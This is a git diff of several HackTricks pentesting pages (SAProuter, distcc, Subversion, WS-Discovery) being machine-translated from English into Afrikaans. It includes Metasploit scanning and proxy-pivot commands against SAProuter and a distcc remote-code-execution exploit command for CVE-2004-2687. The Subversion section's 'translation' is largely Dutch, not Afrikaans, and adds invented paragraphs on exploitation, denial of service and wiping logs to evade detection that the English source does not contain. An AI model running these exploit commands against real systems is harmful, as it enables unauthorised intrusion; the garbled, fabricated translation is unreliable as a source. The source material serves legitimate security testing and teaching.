@@ -178,28 +195,27 @@ node.conn[0].iscsi.IFMarker = No node.conn[0].iscsi.OFMarker = No # END RECORD ``` - -**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm) +**Daar is 'n skrip om die basiese subnet opsporing proses outomaties te doen beskikbaar by** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm) ## **Shodan** * `port:3260 AuthMethod` -## **References** +## **Verwysings** * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/3299-pentesting-saprouter.md b/network-services-pentesting/3299-pentesting-saprouter.md index d2e2d166f..fdcb22595 100644 --- a/network-services-pentesting/3299-pentesting-saprouter.md +++ b/network-services-pentesting/3299-pentesting-saprouter.md @@ -1,91 +1,77 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- ```text PORT STATE SERVICE VERSION 3299/tcp open saprouter? ``` - -This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) +Hierdie is 'n opsomming van die pos vanaf [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) -## Understanding SAProuter Penetration with Metasploit +## Begrip van SAProuter Penetrasie met Metasploit -SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks. +SAProuter tree op as 'n omgekeerde proxy vir SAP-stelsels, hoofsaaklik om toegang tussen die internet en interne SAP-netwerke te beheer. Dit word gewoonlik blootgestel aan die internet deur TCP-poort 3299 toe te laat deur organisatoriese vuurmuure. Hierdie opstelling maak SAProuter 'n aantreklike teiken vir penetrasietoetsing omdat dit as 'n toegangspoort tot hoëwaardige interne netwerke kan dien. -**Scanning and Information Gathering** - -Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port. +**Skandering en Inligting Versameling** +Aanvanklik word 'n skandering uitgevoer om te bepaal of 'n SAP-router op 'n gegewe IP hardloop deur die **sap_service_discovery**-module te gebruik. Hierdie stap is noodsaaklik om die teenwoordigheid van 'n SAP-router en sy oop poort te bevestig. ```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 msf auxiliary(sap_service_discovery) > run ``` - -Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details. - +Na die ontdekking word verdere ondersoek na die SAP-router se konfigurasie uitgevoer met die **sap_router_info_request**-module om moontlik interne netwerkbesonderhede bloot te lê. ```text -msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request +msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101 msf auxiliary(sap_router_info_request) > run ``` +**Opnoem van Interne Dienste** -**Enumerating Internal Services** - -With obtained internal network insights, the **sap_router_portscanner** module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations. - +Met verkrygte interne netwerk-insigte, word die **sap_router_portscanner**-module gebruik om interne gasheerstelsels en dienste deur die SAProuter te ondersoek, wat 'n dieper begrip van interne netwerke en dienskonfigurasies moontlik maak. ```text msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50 msf auxiliary(sap_router_portscanner) > set PORTS 32NN ``` +Hierdie module se buigsaamheid om spesifieke SAP-instanties en poorte te teiken, maak dit 'n effektiewe instrument vir gedetailleerde interne netwerkverkenning. -This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration. - -**Advanced Enumeration and ACL Mapping** - -Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities. +**Gevorderde Opsomming en ACL-mapping** +Verdere skandering kan onthul hoe Toegangsbeheerlyste (ACL's) gekonfigureer is op die SAProuter, wat besonderhede verskaf oor watter verbindinge toegelaat of geblokkeer word. Hierdie inligting is van kardinale belang vir die verstaan van sekuriteitsbeleide en potensiële kwesbaarhede. ```text -msf auxiliary(sap_router_portscanner) > set MODE TCP +msf auxiliary(sap_router_portscanner) > set MODE TCP msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN ``` +**Blind Enumerasie van Interne Gasheer** -**Blind Enumeration of Internal Hosts** +In scenario's waar direkte inligting van die SAProuter beperk is, kan tegnieke soos blind enumerasie toegepas word. Hierdie benadering probeer raai en verifieer die bestaan van interne gasheernommers, wat potensiële teikens onthul sonder direkte IP-adresse. -In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses. - -**Leveraging Information for Penetration Testing** - -Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services. +**Benutting van Inligting vir Pentesting** +Nadat die netwerk in kaart gebring is en toeganklike dienste geïdentifiseer is, kan pentesters Metasploit se proksi-vermoëns gebruik om deur die SAProuter te draai vir verdere ondersoek en uitbuiting van interne SAP-dienste. ```text msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 msf auxiliary(sap_hostctrl_getcomputersystem) > run ``` +**Gevolgtrekking** -**Conclusion** +Hierdie benadering beklemtoon die belangrikheid van veilige SAProuter-konfigurasies en beklemtoon die potensiaal om toegang tot interne netwerke te verkry deur middel van doelgerigte penetrasietoetse. Dit is van kritieke belang om SAP-routers behoorlik te beveilig en hul rol in netwerksekuriteitsargitektuur te verstaan om teen ongemagtigde toegang te beskerm. -This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access. - -For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db). +Vir meer gedetailleerde inligting oor Metasploit-modules en hul gebruik, besoek [Rapid7 se databasis](http://www.rapid7.com/db). -## **References** +## **Verwysings** * [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) @@ -97,16 +83,14 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index 279153c58..d26335061 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -1,64 +1,56 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. - -**Default port:** 3632 +**Distcc** is 'n instrument wat die **kompilasieproses** verbeter deur gebruik te maak van die **onbenutte verwerkingkrag** van ander rekenaars in die netwerk. Wanneer **distcc** op 'n masjien opgestel is, is hierdie masjien in staat om sy **kompilasietaak** na 'n ander stelsel te versprei. Hierdie ontvangende stelsel moet die **distccd daemon** laat loop en 'n **verenigbare kompilator** geïnstalleer hê om die gestuurde kode te verwerk. +**Verstekpoort:** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` +# Uitbuiting -# Exploitation - -Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: - +Kyk of dit vatbaar is vir **CVE-2004-2687** om willekeurige kode uit te voer: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" ``` - # Shodan -_I don't think shodan detects this service._ +_Ek dink nie Shodan detect hierdie diens nie._ -# Resources +# Hulpbronne * [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec) * [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) -Post created by **Álex B (@r1p)** +Pos geskep deur **Álex B (@r1p)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**offisiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 6ee12588c..a98414548 100644 --- a/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -1,59 +1,102 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. - -**Default port:** 3690 +**Subversion** is 'n gesentraliseerde **weergawebeheerstelsel** wat 'n kritieke rol speel in die bestuur van beide die huidige en historiese data van projekte. As 'n **open source**-hulpmiddel, werk dit onder die **Apache-lisensie**. Hierdie stelsel word wyd erken vir sy vermoëns in **sagteware-weergawebeheer en hersieningsbeheer**, wat verseker dat gebruikers veranderinge oor tyd doeltreffend kan opvolg. +**Verstekpoort:** 3690 ``` PORT STATE SERVICE 3690/tcp open svnserve Subversion ``` +## Banner Gaping -## Banner Grabbing +Banner gaping is 'n tegniek wat gebruik word om inligting oor 'n Subversion (SVN) bediener te bekom deur die banner te ondersoek wat deur die bediener tydens die verbinding gestuur word. Die banner is 'n stuk teks wat in die begin van die verbinding gestuur word en dikwels inligting soos die bediener se weergawe en ander relevante inligting bevat. +Om banner gaping uit te voer, kan jy 'n netwerk skandering hulpmiddel soos Nmap gebruik om die bediener se poorte te skandeer en die inligting in die banners te ontleed. Jy kan ook 'n eenvoudige TCP-verbinding gebruik om die banner handmatig te ondersoek. + +Die inligting wat jy uit die banner kan verkry, kan nuttig wees vir verdere aanvalle en penetrasietoetse. Dit kan jou help om die bediener se weergawe te bepaal en moontlike kwesbaarhede te identifiseer wat jy kan uitbuit. + +Dit is belangrik om te onthou dat banner gaping 'n pasiewe tegniek is en nie die bediener self aanval nie. Dit is 'n nuttige stap in die verkenningsfase van 'n penetrasietoets, maar dit moet met ander tegnieke en hulpmiddels gekombineer word om 'n volledige beeld van die bediener se veiligheid te verkry. ``` nc -vn 10.10.10.10 3690 ``` +## Opname -## Enumeration +Om een Subversion (SVN) server te pentesten, is het belangrijk om eerst een grondige opname uit te voeren. Dit omvat het identificeren van de serverversie, het verzamelen van informatie over de repository's en het identificeren van mogelijke kwetsbaarheden. +### Serverversie identificeren + +Om de serverversie van Subversion te identificeren, kunt u een HTTP-verzoek sturen naar de server en de respons controleren op de aanwezigheid van de "SVN" header. U kunt ook proberen verbinding te maken met de server via de SVN-client en de versie-informatie controleren die wordt weergegeven in de uitvoer. + +### Repository's identificeren + +Om de repository's op de Subversion-server te identificeren, kunt u een HTTP-verzoek sturen naar de server en de respons controleren op de aanwezigheid van de "Location" header. U kunt ook proberen verbinding te maken met de server via de SVN-client en de lijst met beschikbare repository's controleren. + +### Kwetsbaarheden identificeren + +Om mogelijke kwetsbaarheden op de Subversion-server te identificeren, kunt u de serverconfiguratie controleren op bekende beveiligingslekken. U kunt ook zoeken naar bekende kwetsbaarheden in de specifieke versie van Subversion die wordt gebruikt door de server. Het is ook belangrijk om te controleren of de server correct is geconfigureerd en of er geen onbeveiligde toegangspunten zijn. + +## Exploitation + +Na het uitvoeren van een grondige opname, kunt u overgaan tot het exploiteren van kwetsbaarheden op de Subversion-server. Dit kan het uitvoeren van aanvallen omvatten, zoals het verkrijgen van ongeautoriseerde toegang tot de repository's, het verkrijgen van gevoelige informatie of het uitvoeren van denial-of-service (DoS) aanvallen. + +### Ongeautoriseerde toegang tot repository's verkrijgen + +Om ongeautoriseerde toegang tot repository's te verkrijgen, kunt u proberen zwakke of standaard inloggegevens te raden. U kunt ook proberen gebruik te maken van bekende beveiligingslekken in de Subversion-server om toegang te krijgen tot de repository's zonder geldige referenties. + +### Gevoelige informatie verkrijgen + +Om gevoelige informatie te verkrijgen, kunt u proberen toegang te krijgen tot de repository's en de inhoud ervan te doorzoeken op vertrouwelijke gegevens. U kunt ook proberen toegang te krijgen tot de serverconfiguratiebestanden om gevoelige informatie zoals wachtwoorden of certificaten te verkrijgen. + +### Denial-of-Service (DoS) aanvallen uitvoeren + +Om een denial-of-service (DoS) aanval uit te voeren, kunt u proberen de Subversion-server te overbelasten door een groot aantal verzoeken te sturen of door specifieke kwetsbaarheden in de server te misbruiken. Dit kan resulteren in het onbeschikbaar maken van de server voor legitieme gebruikers. + +## Post-Exploitation + +Na een succesvolle exploitatie van kwetsbaarheden op de Subversion-server, kunt u overgaan tot post-exploitatieactiviteiten. Dit omvat het verkennen van de repository's, het verkrijgen van verdere toegang tot het systeem en het opruimen van sporen om detectie te voorkomen. + +### Repository's verkennen + +Om de repository's verder te verkennen, kunt u de inhoud ervan doorzoeken op interessante bestanden of gevoelige informatie. U kunt ook proberen toegang te krijgen tot andere repository's die mogelijk aanwezig zijn op het systeem. + +### Verdere toegang tot het systeem verkrijgen + +Om verdere toegang tot het systeem te verkrijgen, kunt u proberen andere kwetsbaarheden in het systeem te misbruiken of gebruik te maken van de verkregen toegang tot de repository's om toegang te krijgen tot andere delen van het systeem. + +### Sporen opruimen + +Om detectie te voorkomen, is het belangrijk om sporen van uw activiteiten op de Subversion-server te verwijderen. Dit kan het verwijderen van logbestanden, het herstellen van gewijzigde bestanden of het terugzetten van de serverconfiguratie naar de oorspronkelijke staat omvatten. ```bash svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the checkout folder ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index f48dc7503..f309cce9c 100644 --- a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md @@ -1,30 +1,27 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
